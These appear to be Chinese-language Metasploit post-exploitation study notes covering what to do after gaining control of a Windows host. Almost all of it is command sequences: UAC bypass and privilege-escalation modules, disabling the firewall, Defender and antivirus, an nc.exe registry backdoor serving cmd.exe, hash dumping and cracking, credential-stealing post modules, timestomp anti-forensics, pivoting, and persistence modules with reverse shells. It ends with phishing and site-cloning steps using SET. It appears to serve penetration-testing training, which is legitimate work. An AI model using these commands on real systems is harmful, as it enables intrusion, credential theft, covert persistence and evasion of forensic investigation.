已經獲得目標操作系統控制權后擴大戰果
提權
信息收集
滲透內網
永久后門
基於已有session擴大戰果
繞過UAC限制
use exploit/windows/local/ask
set session -id
set filename
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
set session -id
set payload
利用漏洞直接提權為systen
use exploit/windows/local/ms13_053_schlamperei
use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_097_ie_registry_symlink
use exploit/windows/local/ppr_flatten_rec
關閉windows防火牆--(需要管理員或system權限)
netsh advfirewall set allprofiles state on
關閉windefend
net stop windefend
Bitlocker磁盤加密
manage-bde -off C:
manage-bde -status C:
關閉DEP
bcdedit.exe /set {current} nx AlwaysOff
殺死防病毒軟件
run killav
run post/windows/manage/killav
開啟遠程桌面服務
run post/windows/manage/enable_rdp
run getuid -e(截屏)
查看遠程桌面
screenshot
use espia
screengrab
注冊表保存着windows幾乎全部配置參數
如果修改不當,可直接造成系統崩潰
修改前完整備份注冊表
某些注冊表的修改是不可逆的
常見用途
修改,增加啟動項
竊取存儲於注冊表中的機密信息
繞過文件型病毒查殺
用注冊表添加NC后門服務(meterpreter)
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -vnc
打開防火牆端口(meterpreter)
execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 4444 "test" ENABLE ALL
shutdown -r -t 0
nc 192.168.1.12 4444
其他注冊表項
https://support.accessdata.com/hc/en-us/articles/204448155-Registry-
Quick-Find-Chart
抓包
load sniffer(加載sniffer)
sniffer_interfaces(查看有幾個網卡)
sniffer_start 2(使用第二個網卡)
sniffer_dump 2 1.cap /下載第二個網卡的數據包,命名為1.cao
在內存緩存區塊存儲抓包(50000包),不寫硬盤,智能過濾meterpreter流量。傳輸全程使用SSL/TLS加密
解碼
use auxiliary/sniffer/psnuffle
set PCAPFILE /root/1.cap
搜索文件
search -f *.ini
search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.docx
John the Ripper 破解弱口令
use post/windows/gather/hashdump (dump hash system權限的meterpreter)
set session id
run 結果保存在/tmp目錄下
use auxiliary/analyze/jtr_crack_fast(破解hash)
run
文件系統訪問會留下痕跡,電子取證重點關注,滲透測試和攻擊者往往希望銷毀文件系統訪問痕跡
最好的避免被電子取證發現的方法:不要碰文件系統---meterpreter的先天優勢所在(完全基於內存)
MAC時間
ls -l --time=atime/mtime/ctime 1.txt
start 1.txt
touch -d "2 days ago" 1.txt
touch -t 1501010101 1.txt
MACE:MFT entry
MFTA:ntfs文件系統的主分區分配表master file table
通常1024字節或2個硬盤扇區,其中存放多項entry信息
包含文件大量信息(大小,名稱,目錄位置,磁盤位置,創建日期)
更多信息可研究 文件系統取證分析技術
Timestomp (meterpreter)
timestomp -v 1.txt(查看詳細時間)
timestomp -f c:\\autoexec.bat 1.txt(使用模板生成)
-m / -a / -c / -e / -z
timestomp -z "1/29/1949 21:11:56" 2.txt
pivoting 跳板 / 樞紐 / 支點
利用已經控制的一台計算機作為入侵內網的跳板
在其他內網計算機看來訪問全部來自於跳板機
run autoroute -s 192.168.2.0/24 (添加路由,訪問外網的目標內網網段)
auxiliary/scanner/portscan/tcp(添加路由后,掃描內網)
pivoting端口轉發portfwd
利用已經被控制計算機,在kali與目標之間實現端口轉發
portfwd add -L LIP -l LPORT -r RIP -p RPORT
portfwd add -L 192.168.1.10 -l 445 -r 2.1.1.11 -p 3389
portfwd list / delete / flush
use exploit/windows/smb/ms08_067_netapi
set RHOST 127.0.0.1
set LHOST 2.1.1.10
use exploit/multi/handler
set exitonsession false
POST模塊
run post/windows/gather/arp_scanner RHOSTS=2.1.1.0/24
run post/windows/gather/checkvm
run post/windows/gather/credentials/credential_collector
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_snmp
run post/multi/recon/local_exploit_suggester
run post/windows/manage/delete_user USERNAME=yuanfh
run post/multi/gather/env
run post/multi/gather/firefox_creds
run post/multi/gather/ssh_creds
run post/multi/gather/check_malware REMOTEFILE=c:\\a.exe
自動執行meterpreter腳本
set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
set InitialAutoRunScript checkvm
自動執行post模塊
set InitialAutoRunScript migrate -n explorer.exe
set AutoRunScript post/windows/gather/dumplinks
持久后門
利用漏洞取得的meterpreter shell 運行於內存中,重啟失效
重復exploit漏洞可能造成服務崩潰,持久后門保證漏洞修復后仍可遠程控制
meterpreter后門
meterpreter>run metsvc -A (自動運行匹配shell)
use exploit/multi/handler(然后去鏈接目標)
set payload windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 192.168.1.12
持久后門
meterpreter>run persistence -h
meterpreter>run persistence -X -i 10 -p 4444 -r 192.168.1.10(反彈shell監聽本機)
meterpreter>run persistence -U -i 20 -p 4444 -r 192.168.1.10(反彈shell監聽本機)
meterpreter>run persistence -S -i 20 -p 4444 -r 192.168.1.10(反彈shell監聽本機)
社會工程學
metasploit可以很好的配合到社會工程學攻擊的各個階段
setooklkit工具包大量依賴metasploit
基於瀏覽器等客戶端軟件漏洞實現對客戶端計算機的攻擊
社會:人是社會化的動物(人與人之間的關系,群體利益決定結構架構)
工程:依據標准的步驟完成任務達成目標的一套方法
通過人的交流,使用欺騙偽裝等手段繞過安全機制實現入侵的非技術手段
社會工程學攻擊的四個階段
研究:信息收集(web,媒體,垃圾桶,物理),確定並研究目標
鈎子:與目標建立第一次交談(hook,下套)
下手:與目標建立信任並獲取信息
退場:不引起目標懷疑的離開現場
類型:
基於人的社工:
搭載
偽造身份
偷聽/竊肩
反社工
垃圾桶工程
基於計算機的社工:
彈出窗口
內部網絡攻擊
釣魚郵件
短信詐騙
Social-Engineering Tookit(SET)
站點克隆:1 2 3 2
發送釣魚郵件:1 1 2
web站點攻擊向量:1 2 1 2
中間文件全部存在~/.set目錄中
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn